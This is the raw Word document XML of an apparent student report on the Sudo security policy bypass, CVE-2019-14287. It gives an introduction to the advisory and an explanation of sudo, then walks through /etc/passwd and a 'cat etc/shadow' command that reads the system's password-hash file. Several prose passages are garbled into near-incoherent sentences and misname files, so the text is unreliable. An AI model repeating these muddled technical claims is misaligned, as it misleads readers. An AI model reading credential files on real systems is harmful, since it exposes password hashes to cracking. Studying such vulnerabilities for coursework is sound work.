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C0AAB" w14:textId="6829B140" w:rsidR="00FE142C" w:rsidRDefault="00987BF8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="600518A4" wp14:editId="47717F33">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="21780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24518" w14:textId="77777777" w:rsidR="00FE142C" w:rsidRDefault="00FE142C"/>
    <w:p w14:paraId="2A01970A" w14:textId="77777777" w:rsidR="00FE142C" w:rsidRDefault="00FE142C"/>
    <w:p w14:paraId="1A0C3500" w14:textId="77777777" w:rsidR="00FE142C" w:rsidRDefault="00FE142C"/>
    <w:p w14:paraId="6159F6B9" w14:textId="77777777" w:rsidR="00FE142C" w:rsidRDefault="00FE142C"/>
    <w:p w14:paraId="535AFA1D" w14:textId="77777777" w:rsidR="00FE142C" w:rsidRDefault="00FE142C"/>
    <w:p w14:paraId="6439FB62" w14:textId="77777777" w:rsidR="00FE142C" w:rsidRDefault="00FE142C"/>
    <w:p w14:paraId="1F6DB811" w14:textId="77777777" w:rsidR="00FE142C" w:rsidRPr="00025E70" w:rsidRDefault="00FE142C" w:rsidP="00FE142C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00025E70">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Sri Lanka Institute of Information Technology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3B395E" w14:textId="77777777" w:rsidR="00FE142C" w:rsidRDefault="00FE142C" w:rsidP="00FE142C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="405337EC" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B5226E4" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20BC3EE9" w14:textId="15020F17" w:rsidR="00FE142C" w:rsidRPr="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00647322">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00647322">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> Security Policy Bypass (CVE 2019-14287)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C62C36" w14:textId="5EC205E6" w:rsidR="00FE142C" w:rsidRPr="00647322" w:rsidRDefault="00FE142C" w:rsidP="00987BF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D9B0877"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3FA0B497" w14:textId="77777777" w:rsidR="00934F19" w:rsidRDefault="00934F19" w:rsidP="00FE142C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="133CEC56" w14:textId="2BD49CEE" w:rsidR="00FE142C" w:rsidRPr="00FE142C" w:rsidRDefault="00647322" w:rsidP="00297E66">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="2520" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r w:rsidR="00FE142C" w:rsidRPr="00FE142C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Submitted by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23434CCD" w14:textId="77777777" w:rsidR="00FE142C" w:rsidRPr="00647322" w:rsidRDefault="00FE142C" w:rsidP="00FE142C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="36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274"/>
        <w:gridCol w:w="4356"/>
      </w:tblGrid>
      <w:tr w:rsidR="00647322" w:rsidRPr="00647322" w14:paraId="5F5F2F13" w14:textId="77777777" w:rsidTr="00987BF8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4428" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F3B4E4C" w14:textId="4F91D551" w:rsidR="00987BF8" w:rsidRPr="00647322" w:rsidRDefault="00987BF8" w:rsidP="00987BF8">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="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32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gistration Number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4428" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5137A91A" w14:textId="4DD5AB84" w:rsidR="00987BF8" w:rsidRPr="00647322" w:rsidRDefault="00987BF8" w:rsidP="00987BF8">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="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32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c>
      </w:tr>
      <w:tr w:rsidR="00647322" w:rsidRPr="00647322" w14:paraId="7709AF9A" w14:textId="77777777" w:rsidTr="00987BF8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4428" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31E66E22" w14:textId="1DBD3D1D" w:rsidR="00987BF8" w:rsidRPr="00647322" w:rsidRDefault="00647322" w:rsidP="00987BF8">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="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32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18030372</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4428" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="701BD6BB" w14:textId="03CFCA53" w:rsidR="00987BF8" w:rsidRPr="00647322" w:rsidRDefault="00647322" w:rsidP="00987BF8">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="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4732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w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0064732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arunarathna</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67F068C4" w14:textId="7AA602CB" w:rsidR="00297E66" w:rsidRPr="00647322" w:rsidRDefault="00297E66" w:rsidP="00987BF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CF00F35" w14:textId="77777777" w:rsid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70841C39" w14:textId="77777777" w:rsidR="00934F19" w:rsidRDefault="00934F19" w:rsidP="00FE142C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EA1395A" w14:textId="544F885F" w:rsid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0A2F7DE8" w14:textId="5AFDE09B" w:rsidR="00987BF8" w:rsidRDefault="00987BF8" w:rsidP="00FE142C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="589E8468" w14:textId="77777777" w:rsidR="00987BF8" w:rsidRPr="00FE142C" w:rsidRDefault="00987BF8" w:rsidP="00FE142C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A222F81"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46078EFC" w14:textId="2B052C58"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0082FACC" w14:textId="3BDC1AE2"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0600217B" w14:textId="4E110E4D"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304DCAED" w14:textId="0B09A3D9" w:rsidR="00647322" w:rsidRDefault="00987BF8" w:rsidP="00647322">
      <w:r>
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00378CCE" w14:textId="7A5A933A" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00647322">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCF2468" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="336EA856" w14:textId="7894D18A" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r w:rsidRPr="00051691">
        <w:t xml:space="preserve">In the past couple of days, news from CVE-2019-14287—a newly discovered open source vulnerability in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00051691">
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00051691">
        <w:t>, the famous command tool from Linux has captured quite a few headlines. Because vulnerabilities can frequently cause a stir in widespread and proven open source projects, we decided to present you with a fast cheat sheet to let you know exactly what the fuss is all about.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373CB499" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> team published on October 14 a security warning regarding CVE-2019-14287, a new security problem discovered by Apple Information Security's Joe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Vennix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, in all versions of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> prior to version 1.8.28. The security vulnerability may allow a malicious user to execute arbitrary commands as a root user even in cases where access to the root is not permitted. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE924C1" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">Considering the widespread use of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> by Linux users, it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is no surprise that everyone is talking about the vulnerability to protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4133CB6B" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D29D4">
        <w:t>Here's</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D29D4">
        <w:t xml:space="preserve"> what you need to know about the weakness in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D29D4">
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D29D4">
        <w:t xml:space="preserve">, how it functions and how to manage vulnerable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D29D4">
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D29D4">
        <w:t xml:space="preserve"> components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0F9066" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="304A6A17" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="4C9AFE77" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="17A02E23" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="3D8F56D5" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="70D05653" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="1F2392AA" w14:textId="4DC742BA" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00647322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">What is the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00647322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00647322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7057B402" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32BE561B" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r w:rsidRPr="007D5ED2">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D5ED2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D5ED2">
        <w:t xml:space="preserve"> command on Unix-like operating systems allows a user with appropriate permissions to execute a command as another user. The default commands are executed by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D5ED2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D5ED2">
        <w:t xml:space="preserve"> as root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFA1530" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="770BA1EF" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EEE7386" wp14:editId="2CD2B811">
            <wp:extent cx="573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14504351" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="24AF3E98" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="2C537507" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="663326B5" w14:textId="72010616" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:t xml:space="preserve">You can also find that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>out</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> so this Vulnerability has a pseudo-version effect 1.8.28 that's or is pretty recent The same edition that had this patched Issue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5360D501" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AEC3C98" wp14:editId="43DD5395">
            <wp:extent cx="5730240" cy="12496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44D86CBE" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="3DD085A6" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="03A3F5DE" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="30EF9D6B" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="3323C377" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="0B71524A" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="4C21F768" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="51071B47" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="711DBBC3" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="0647BF7D" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="0703A61D" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="441C00D8" w14:textId="32086B9F" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r w:rsidRPr="00416046">
        <w:t xml:space="preserve">Then you have the group Name, which is G-ID denotes you then have your home User name, and default The shell which will be used by the User locking in all of this right now That information will be stored in the Login file with password file In reality it exists inside </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED46A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00416046">
        <w:t xml:space="preserve"> So folder </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED46A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED46A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/password</w:t>
      </w:r>
      <w:r w:rsidRPr="00416046">
        <w:t xml:space="preserve"> again and  Only kept the contents of the file </w:t>
      </w:r>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00416046">
        <w:t>, the first user's still going to be the root user Be the user in root and then obey What other accounts you have about the System</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00416046">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015924FB" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="53EC61BC" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CDC5618" wp14:editId="4BDF9DD3">
            <wp:extent cx="5730240" cy="41376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2E6E5E1D" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="5B1D444B" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="0CD1CF36" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="6806F58D" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="6E06FF22" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="1D769E2F" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="6A9F3B07" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="79A86018" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="4B7B6FC8" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="597C1742" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="08952362" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="5C7B295C" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="322FF54F" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="381AE8CC" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C4D1973" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B161425" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BEEA88D" w14:textId="64D644B1" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="006531FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006531FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006531FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/shadow</w:t>
      </w:r>
      <w:r w:rsidRPr="006531FD">
        <w:t xml:space="preserve"> and let me open this so you can see that we are created by the root user as the first entry here so that is the layout in essence so that you have the username and the password now, of course, this is a hashed password or an encrypted password and you can get details about the type of hashing algorithm used by looking at the number that is encapsulated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC52C47" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CB68FF3" wp14:editId="62BD577C">
            <wp:extent cx="5730240" cy="43281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6040476E" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="11E4F125" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
